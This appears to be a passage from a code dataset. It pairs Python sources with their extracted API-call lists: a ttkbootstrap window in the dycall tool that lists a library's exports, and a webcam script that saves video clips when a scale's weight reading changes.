"<ButtonRelease-1>",
lambda *_: ExportsTreeView(
self.__exports, pathlib.Path(self.__lib_path.get()).name
),
add=False,
)
def sort(self, *_):
"""Sorts the list of export names and repopulates the combobox."""
if self.__is_loaded.get():
sorter = self.__sort_order.get()
log.debug("Sorting w.r.t. %s", sorter)
names = self.__export_names
if sorter == "Name (ascending)":
names.sort()
elif sorter == "Name (descending)":
names.sort(reverse=True)
self.cb.configure(values=names)
self.__status.set("Sort order changed")
class ExportsTreeView(tk.Toplevel):
"""Displays detailed information about all the exports of a library.
Following information is displayed:
- Address
- Name
- Demangled name (whenever available)
- Ordinal (Windows only)
"""
def __init__(self, exports: list[Export], lib_name: str):
log.debug("Initialising")
super().__init__(
title=f"{MsgCat.translate('Exports')} - {lib_name}", size=(400, 500)
)
self.__old_height = 0
self.withdraw()
coldata = [
"Address",
"Name",
{"text": "Demangled", "stretch": True},
]
is_pe = isinstance(exports[0], PEExport)
if is_pe:
coldata.insert(0, "Ordinal")
self.__tv = tv = Tableview(
self,
searchable=True,
autofit=True,
coldata=coldata,
paginated=True,
pagesize=25,
)
tv.pack(fill="both", expand=True)
for e in exports:
values = [e.address, e.name, e.demangled_name] # type: ignore
if is_pe:
if TYPE_CHECKING:
assert isinstance(e, PEExport) # nosec
values.insert(0, e.ordinal)
tv.insert_row(values=values)
tv.load_table_data()
self.bind(
"<F11>",
lambda *_: self.attributes(
"-fullscreen", not self.attributes("-fullscreen")
),
)
self.bind("<Configure>", self.resize)
self.deiconify()
self.focus_set()
log.debug("Initialised")
def resize(self, event: tk.tk.Event):
"""Change the treeview's `pagesize` whenever this window is resized.
I came up with this because there is no way to show a vertical
scrollbar in/for the treeview.
"""
new_height = event.height
if event.widget.widgetName == "toplevel" and new_height != self.__old_height:
# ! This is an expensive call, avoid it whenever possible
self.__tv.pagesize = int(new_height) / 20
self.__old_height = new_height
| [
"logging.getLogger",
"dycall.util.StaticThemedTooltip",
"ttkbootstrap.dialogs.Messagebox.show_error",
"ttkbootstrap.localization.MessageCatalog.translate",
"ttkbootstrap.ttk.Label",
"dycall.util.get_img",
"ttkbootstrap.tableview.Tableview",
"ttkbootstrap.dialogs.Messagebox.show_warning"
] | [((563, 590), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (580, 590), False, 'import logging\n'), ((2172, 2191), 'dycall.util.get_img', 'get_img', (['"""list.png"""'], {}), "('list.png')\n", (2179, 2191), False, 'from dycall.util import StaticThemedTooltip, get_img\n'), ((2210, 2248), 'ttkbootstrap.ttk.Label', 'ttk.Label', (['self'], {'image': 'self.__list_png'}), '(self, image=self.__list_png)\n', (2219, 2248), False, 'from ttkbootstrap import ttk\n'), ((7531, 7628), 'ttkbootstrap.tableview.Tableview', 'Tableview', (['self'], {'searchable': '(True)', 'autofit': '(True)', 'coldata': 'coldata', 'paginated': '(True)', 'pagesize': '(25)'}), '(self, searchable=True, autofit=True, coldata=coldata, paginated=\n True, pagesize=25)\n', (7540, 7628), False, 'from ttkbootstrap.tableview import Tableview\n'), ((2305, 2352), 'dycall.util.StaticThemedTooltip', 'StaticThemedTooltip', (['self.lb', '"""List of exports"""'], {}), "(self.lb, 'List of exports')\n", (2324, 2352), False, 'from dycall.util import StaticThemedTooltip, get_img\n'), ((5085, 5206), 'ttkbootstrap.dialogs.Messagebox.show_warning', 'Messagebox.show_warning', (['f"""These export names couldn\'t be demangled: {failed}"""', '"""Demangle Errors"""'], {'parent': 'self.__root'}), '(f"These export names couldn\'t be demangled: {failed}",\n \'Demangle Errors\', parent=self.__root)\n', (5108, 5206), False, 'from ttkbootstrap.dialogs import Messagebox\n'), ((5670, 5759), 'ttkbootstrap.dialogs.Messagebox.show_error', 'Messagebox.show_error', (['(err % selected_export)', '"""Export not found"""'], {'parent': 'self.__root'}), "(err % selected_export, 'Export not found', parent=\n self.__root)\n", (5691, 5759), False, 'from ttkbootstrap.dialogs import Messagebox\n'), ((7149, 7176), 'ttkbootstrap.localization.MessageCatalog.translate', 'MsgCat.translate', (['"""Exports"""'], {}), "('Exports')\n", (7165, 7176), True, 'from ttkbootstrap.localization import MessageCatalog as MsgCat\n')] |
#!/usr/bin/env python3
#import face_recognition
import cv2
import numpy as np
from datetime import datetime, timedelta
from buffer import Buffer
from collections import deque
import os
from copy import copy
import archive
WEIGHT_EPS = 5
TIMEOUT = 5 # in seconds
def poll_weight():
return 500
# with an fps we then have a "before" duration of 15 seconds
video_buffer = Buffer(300)
building = False
clip = None
previous_weight = poll_weight()
last_weight_event = None
cap = cv2.VideoCapture(0)
while True:
archive.try_upload_buffer()
# if enough_diff is true we will actually start the recording
weight = poll_weight()
weight_diff = weight - previous_weight
enough_diff = abs(weight_diff) >= WEIGHT_EPS
ret, frame = cap.read()
rgb_frame = cv2.resize(frame, (0, 0), fx=.5, fy=.5)[:, :, ::-1]
#face_locations = face_recognition.face_locations(rgb_frame)
print(
len(video_buffer.q),
len(clip) if clip is not None else 0,
building,
#face_locations
)
point = {
'time': datetime.now(),
#'face_locations': face_locations,
'frame': frame,
'current_weight': weight,
}
if building:
clip.append(point)
else:
video_buffer.add(point)
if not building and enough_diff:
building = True
clip = copy(video_buffer.q)
video_buffer.clear()
elif building and datetime.now() >= last_weight_event + timedelta(seconds=TIMEOUT):
frames = list(clip)
clip = None
building = False
print("creating clip of len", len(frames))
print(archive.create_from_clip(frames))
previous_weight = weight
if enough_diff:
last_weight_event = datetime.now()
| [
"archive.try_upload_buffer",
"buffer.Buffer",
"copy.copy",
"datetime.timedelta",
"datetime.datetime.now",
"cv2.VideoCapture",
"archive.create_from_clip",
"cv2.resize"
] | [((376, 387), 'buffer.Buffer', 'Buffer', (['(300)'], {}), '(300)\n', (382, 387), False, 'from buffer import Buffer\n'), ((482, 501), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (498, 501), False, 'import cv2\n'), ((519, 546), 'archive.try_upload_buffer', 'archive.try_upload_buffer', ([], {}), '()\n', (544, 546), False, 'import archive\n'), ((778, 819), 'cv2.resize', 'cv2.resize', (['frame', '(0, 0)'], {'fx': '(0.5)', 'fy': '(0.5)'}), '(frame, (0, 0), fx=0.5, fy=0.5)\n', (788, 819), False, 'import cv2\n'), ((1061, 1075), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1073, 1075), False, 'from datetime import datetime, timedelta\n'), ((1347, 1367), 'copy.copy', 'copy', (['video_buffer.q'], {}), '(video_buffer.q)\n', (1351, 1367), False, 'from copy import copy\n'), ((1737, 1751), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1749, 1751), False, 'from datetime import datetime, timedelta\n'), ((1419, 1433), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1431, 1433), False, 'from datetime import datetime, timedelta\n'), ((1625, 1657), 'archive.create_from_clip', 'archive.create_from_clip', (['frames'], {}), '(frames)\n', (1649, 1657), False, 'import archive\n'), ((1457, 1483), 'datetime.timedelta', 'timedelta', ([], {'seconds': 'TIMEOUT'}), '(seconds=TIMEOUT)\n', (1466, 1483), False, 'from datetime import datetime, timedelta\n')] |